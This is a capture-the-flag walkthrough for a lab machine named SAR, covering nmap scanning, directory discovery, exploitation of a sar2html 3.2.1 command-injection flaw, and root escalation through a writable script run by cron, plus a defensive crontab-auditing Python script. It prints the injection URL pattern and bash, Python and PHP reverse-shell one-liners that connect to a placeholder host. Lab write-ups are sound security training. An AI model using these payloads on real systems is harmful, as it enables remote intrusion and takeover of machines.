
Target machine: SAR

WP

nmap

  1. Check the local IP information with the ipconfig command. The virtual machine's IP is 192.168.233.1, so the target machine's IP must lie in the 192.168.233.0/24 network segment.
  2. Use nmap to scan for live hosts in this segment: nmap -sn 192.168.233.0/24
    The target IP is 192.168.233.130.
  3. Perform a deeper scan of the host's open ports: nmap 192.168.233.130
    Only port 80 has an open service.

Identify vulnerabilities

  1. Access the HTTP service. It shows the Apache2 Ubuntu Default Page.
  2. Use dirsearch to scan for directories. A robots.txt file is discovered.
  3. Accessing it reveals the directory name "sar2HTML".
  4. Accessing that directory reveals the sar2html Ver 3.2.1 page.
  5. An online search shows a known vulnerability in this version of the form http://target-ip/sar2HTML/index.php?plot=;[injected system commands].
  6. Therefore, it can be exploited to execute a reverse shell.

Reverse shell

  1. bash -c 'bash -i >& /dev/tcp/[IP]/5566 0>&1'
    No connection is received.

Three ways to execute a reverse shell:
bash
bash -c 'bash -i >& /dev/tcp/[IP]/5566 0>&1'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
PHP
php -r '$sock=fsockopen("[IP]",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

  1. Trying the python variant also fails. The reason is that the target machine has Python 3 installed, so the interpreter is invoked as python3 rather than python:
    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  2. A shell is obtained, but without root privileges.

Privilege escalation

  1. Search the file system for privilege-escalation opportunities.

ls -la /var/www/html
total 40
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 .
drwxr-xr-x 4 www-data www-data  4096 Oct 21  2019 ..
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Oct 20  2019 sar2HTML
-rwxrwxrwx 1 www-data www-data   233 Aug 22 12:17 write.sh

cat finally.sh
#!/bin/sh
./write.sh

cat write.sh
#!/bin/sh
touch /tmp/gateway

  2. Both scripts do nothing more than create a file, yet they run with root privileges (finally.sh is owned by root), and write.sh is world-writable, so we have permission to change what they do. This is obviously the vulnerability prepared for us.
  3. So the next step is to find out what executes it.
    Background on cron jobs:
      1. Definition: cron is the Linux mechanism for automatically running commands or scripts at predefined time intervals.
      2. /etc/crontab: the system-wide cron configuration file, readable by all users (typically mode 644, -rw-r--r--) but modifiable only by root. Each line has the format Minute Hour Day Month Weekday User Command: the five time fields give the schedule, followed by the user the job runs as and the command or script to execute.
      3. Example: a task running daily at 3 AM as root to rotate logs:
        0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
  4. In /etc/crontab we can see that finally.sh is executed every five minutes. So we just need to write the reverse-shell command into the script and wait for the connection.
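The condition this escalation relies on (a root cron job whose script, or any directory on the script's path, can be changed by a non-root user) is something a defender can audit mechanically. The following Python script is an added example, not part of the original write-up or of the SAR machine: it parses system-crontab lines, takes the first token of each root job's command as the executable, and walks every path component checking owner and group/world-write bits. The crontab text and the ownership/permission table are constructed from the listing above; the `*/5` entry for finally.sh is an assumption, since the write-up only says it runs every five minutes.

```python
"""Audit /etc/crontab-style entries for root jobs whose script, or any
directory on its path, is owned by a non-root user or is group/world-writable.

Added example for the cron privilege-escalation discussion. The crontab text
and the stat table are constructed from the write-up's `ls -la` output.
"""
import re
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Constructed /etc/crontab. The finally.sh line is an assumption modelled on
# "executed every five minutes"; the write-up does not quote the real entry.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * root /var/www/html/finally.sh
@daily root /usr/bin/apt-get clean
17 * * * * www-data /usr/local/bin/cleanup-uploads
"""

# Constructed stat table: path -> (owner, permission bits), mirroring the
# listing above. Paths not listed are treated as root-owned 0o755.
SAMPLE_STAT: Dict[str, Tuple[str, int]] = {
    "/var/www": ("www-data", 0o755),
    "/var/www/html": ("www-data", 0o755),
    "/var/www/html/finally.sh": ("root", 0o755),
    "/var/www/html/write.sh": ("www-data", 0o777),
    "/usr/sbin/logrotate": ("root", 0o755),
}

StatFn = Callable[[str], Optional[Tuple[str, int]]]


@dataclass
class CronEntry:
    schedule: str
    user: str
    command: str
    line_no: int


def parse_crontab(text: str) -> List[CronEntry]:
    """Parse system-crontab lines (five time fields or an @special, then user,
    then command). Comments, blank lines and VAR=value assignments are skipped."""
    entries: List[CronEntry] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)          # @daily user command...
            if len(parts) < 3:
                continue
            sched, user, cmd = parts
        else:
            parts = line.split(None, 6)          # m h dom mon dow user command...
            if len(parts) < 7:
                continue
            sched, user, cmd = " ".join(parts[:5]), parts[5], parts[6]
        entries.append(CronEntry(sched, user, cmd, n))
    return entries


def _path_chain(path: str) -> List[str]:
    """'/var/www/html/finally.sh' -> ['/var', '/var/www', '/var/www/html', '/var/www/html/finally.sh']"""
    parts = path.strip("/").split("/")
    return ["/" + "/".join(parts[:i]) for i in range(1, len(parts) + 1)]


def weak_components(path: str, lookup: StatFn) -> List[str]:
    """Report every path component that a non-root user could replace or edit:
    not owned by root, or writable by group/others."""
    findings: List[str] = []
    for comp in _path_chain(path):
        info = lookup(comp)
        if info is None:
            continue
        owner, mode = info
        if owner != "root":
            findings.append(f"{comp}: owned by {owner}")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{comp}: mode {oct(mode)} is group/world-writable")
    return findings


def audit_root_jobs(crontab_text: str, lookup: StatFn) -> Dict[str, List[str]]:
    """Map each root cron command to the reasons it is hijackable; {} means clean."""
    results: Dict[str, List[str]] = {}
    for e in parse_crontab(crontab_text):
        if e.user != "root":
            continue
        exe = e.command.split()[0]
        if not exe.startswith("/"):
            # Resolved through cron's PATH at run time; flag so a human reviews it.
            results[e.command] = [f"{exe}: relative path resolved via cron PATH"]
            continue
        weak = weak_components(exe, lookup)
        if weak:
            results[e.command] = weak
    return results


def sample_lookup(path: str) -> Tuple[str, int]:
    """Stat function over the constructed table (root 0o755 for unknown paths)."""
    return SAMPLE_STAT.get(path, ("root", 0o755))


if __name__ == "__main__":
    for cmd, reasons in audit_root_jobs(SAMPLE_CRONTAB, sample_lookup).items():
        print(cmd)
        for r in reasons:
            print("  -", r)
```

On the constructed data only the finally.sh job is reported, and for a reason that is easy to miss when reading the listing: finally.sh itself is root-owned 755, but /var/www and /var/www/html are owned by www-data, who can therefore delete and recreate the file. The check does not follow a script's own invocations, so the world-writable write.sh that finally.sh calls would only be found by reading finally.sh; on a live system, replace sample_lookup with a function built on os.stat and pwd.getpwuid.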

Conclusion

First, use nmap to collect information about IP addresses and open ports. Second, after finding the HTTP page, use dirsearch to look for hidden clues. Third, when facing a well-known web application, search the Internet for known vulnerabilities in it. Fourth, use the resulting command-execution vulnerability to obtain a reverse shell directly. Finally, search the file system for privilege-escalation opportunities (files that run as root, are executed automatically, and can be changed).

http://www.dtcms.com/a/343674.html
